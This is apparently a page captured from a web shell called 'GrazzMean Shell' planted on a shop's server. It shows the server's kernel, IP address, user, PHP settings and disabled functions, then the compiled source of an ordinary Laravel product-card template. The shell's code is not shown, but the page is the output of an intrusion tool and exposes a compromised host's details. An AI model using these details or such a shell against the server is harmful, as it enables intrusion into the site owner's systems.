shell bypass 403

GrazzMean Shell

Uname: Linux peekpos.com 6.8.0-1060-aws #63~22.04.1-Ubuntu SMP Tue Jun 30 02:32:53 UTC 2026 x86_64
Software: Apache
PHP version: 8.3.25 [ PHP INFO ] PHP os: Linux
Server Ip: 47.130.192.226
Your Ip: 10.1.31.86
User: www (1001) | Group: www (1001)
Safe Mode: OFF
Disable Function:
passthru,putenv,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : 01a23e45cbe11d65f029b184e5d0bcd7.php
<div class="col">
    <?php
        if ($itemdata['variation']->count() > 0) {
            if ($itemdata['top_deals'] == 1 && @helper::top_deals() != null) {
                if (@helper::top_deals()->offer_type == 1) {
                    $price = $itemdata['variation'][0]->price - @helper::top_deals()->offer_amount;
                } else {
                    $price =
                        $itemdata['variation'][0]->price -
                        $itemdata['variation'][0]->price * (@helper::top_deals()->offer_amount / 100);
                }
                $original_price = $itemdata['variation'][0]->price;
            } else {
                $price = $itemdata['variation'][0]->price;
                $original_price = $itemdata['variation'][0]->original_price;
            }
        } else {
            if ($itemdata->top_deals == 1 && @helper::top_deals() != null) {
                if (@helper::top_deals()->offer_type == 1) {
                    $price = $itemdata->price - @helper::top_deals()->offer_amount;
                } else {
                    $price = $itemdata->price - $itemdata->price * (@helper::top_deals()->offer_amount / 100);
                }

                $original_price = $itemdata->price;
            } else {
                $price = $itemdata->price;
                $original_price = $itemdata->original_price;
            }
        }
        $off = $original_price > 0 ? number_format(100 - ($price * 100) / $original_price, 1) : 0;
    ?>

    <div class="card pro-item rounded h-100 rounded-4 card-hover overflow-hidden">
        <div class="d-flex h-100">
            <div class="card-image card-second d-flex align-items-center col-auto position-relative">
                <a href="<?php echo e(URL::to('item-' . $itemdata->slug)); ?>">
                    <img src="<?php echo e($itemdata['item_image']->image_url); ?>" class="card-img-top border-0 rounded-4 p-1"
                        alt="dishes">
                </a>
                <ul class="option-wrap-2 p-0 gap-2">
                    
                    <?php if(Auth::user() && Auth::user()->type == 2): ?>
                        <li class="tooltip-left option-round m-0" data-bs-toggle="tooltip" data-bs-title="Wishlist">
                            <?php if($itemdata->is_favorite == 1): ?>
                                <a class="heart-icon btn btn-wishlist p-1" href="javascript:void(0)"
                                    onclick="managefavorite('<?php echo e($itemdata->id); ?>',0,'<?php echo e(URL::to('/managefavorite')); ?>','<?php echo e(request()->url()); ?>')"
                                    title="<?php echo e(trans('labels.remove_wishlist')); ?>">
                                    <i class="fa-solid fa-heart fs-7"></i>
                                </a>
                            <?php else: ?>
                                <a class="heart-icon btn btn-wishlist p-1" href="javascript:void(0)"
                                    onclick="managefavorite('<?php echo e($itemdata->id); ?>',1,'<?php echo e(URL::to('/managefavorite')); ?>','<?php echo e(request()->url()); ?>')"
                                    title="<?php echo e(trans('labels.add_wishlist')); ?>">
                                    <i class="fa-regular fa-heart fs-7"></i>
                                </a>
                            <?php endif; ?>
                        </li>
                    <?php endif; ?>
                    <li class="tooltip-left option-round m-0" data-bs-toggle="tooltip" data-bs-title="View">
                        <a href="<?php echo e(URL::to('item-' . $itemdata->slug)); ?>" class="wishlist-btn">
                            <i class="fa-regular fa-eye"></i>
                        </a>
                    </li>
                    <?php if(@helper::appdata()->online_order == 1): ?>
                        <li class="tooltip-left option-round m-0" data-bs-toggle="tooltip" data-bs-title="Add To Cart">

                            <a class="addtocart-btn  wishlist-btn"
                                onclick="showitem('<?php echo e($itemdata->slug); ?>','<?php echo e(URL::to('/show-item')); ?>')"> <i
                                    class="fa-solid fa-basket-shopping fs-7"></i>
                            </a>

                        </li>
                    <?php endif; ?>
                    
                </ul>
            </div>
            <div class="card-body py-2 col-auto">
                <div class="d-flex flex-column w-100 justify-content-center h-100">
                    <div>
                        <?php if($original_price > $price): ?>
                            <div class="d-flex item-offer-2 mb-1">
                                <div class="badge">
                                    <p class="m-0"><?php echo e($off); ?>% <?php echo e(trans('labels.off')); ?></p>
                                </div>
                            </div>
                        <?php endif; ?>
                        <div class="pb-1 cat-span d-flex justify-content-between">
                            <span class="text-muted"><?php echo e(@$itemdata['category_info']->category_name); ?></span>
                            <?php if(helper::appdata()->review_approved_status == 1): ?>
                                <div class="d-flex align-items-center gap-1 pro_item_rating">
                                    <i class="fa-solid fa-star text-warning"></i>
                                    <a href="<?php echo e(URL::to('/item-' . $itemdata->slug . '#review-tab')); ?>"
                                        class="cursor-pointer text-dark color-changer">
                                        <p class="m-0 fs-8 fw-600">
                                            <?php echo e(number_format(helper::getavgreviews($itemdata->id)->ratings_average, 1)); ?>

                                        </p>
                                    </a>
                                </div>
                            <?php endif; ?>
                        </div>
                        <a href="<?php echo e(URL::to('item-' . $itemdata->slug)); ?>">
                            <h5 class="item-card-title fs-7 fw-600 text-dark color-changer">
                                <?php if($itemdata->item_type == 1): ?>
                                    <img src="<?php echo e(helper::image_path('veg.svg')); ?>" alt=""
                                        class="<?php echo e(session()->get('direction') == '2' ? 'ms-1' : 'me-1'); ?> mb-1 item-type-img">
                                <?php else: ?>
                                    <img src="<?php echo e(helper::image_path('nonveg.svg')); ?>" alt=""
                                        class="<?php echo e(session()->get('direction') == '2' ? 'ms-1' : 'me-1'); ?> mb-1 item-type-img">
                                <?php endif; ?>
                                <?php echo e($itemdata->item_name); ?>

                            </h5>
                        </a>
                        <?php if($itemdata->stock_management == 1): ?>
                            <?php if($itemdata->qty <= 0 && $itemdata->has_variation == 2): ?>
                                <p class="m-0 fs-8 text-danger fw-600"><?php echo e(trans('labels.out_of_stock')); ?></p>
                            <?php else: ?>
                                <p class="m-0 fs-8 text-success fw-600"><?php echo e(trans('labels.in_stock')); ?></p>
                            <?php endif; ?>
                        <?php endif; ?>
                    </div>
                    <div class="item-card-footer-2 pt-md-1 pt-0">
                        <div class="d-flex justify-content-between align-items-center pro_price">
                            <p class="fs-6 m-0 color-changer"><?php echo e(helper::currency_format($price)); ?>

                                <?php if($original_price > $price): ?>
                                    <span><del
                                            class="text-muted"><?php echo e(helper::currency_format($original_price)); ?></del></span>
                                <?php endif; ?>
                            </p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<?php /**PATH /www/wwwroot/koreanshop.lk/resources/views/web/product_card/list_view/listview_product_1.blade.php ENDPATH**/ ?>
© 2026 GrazzMean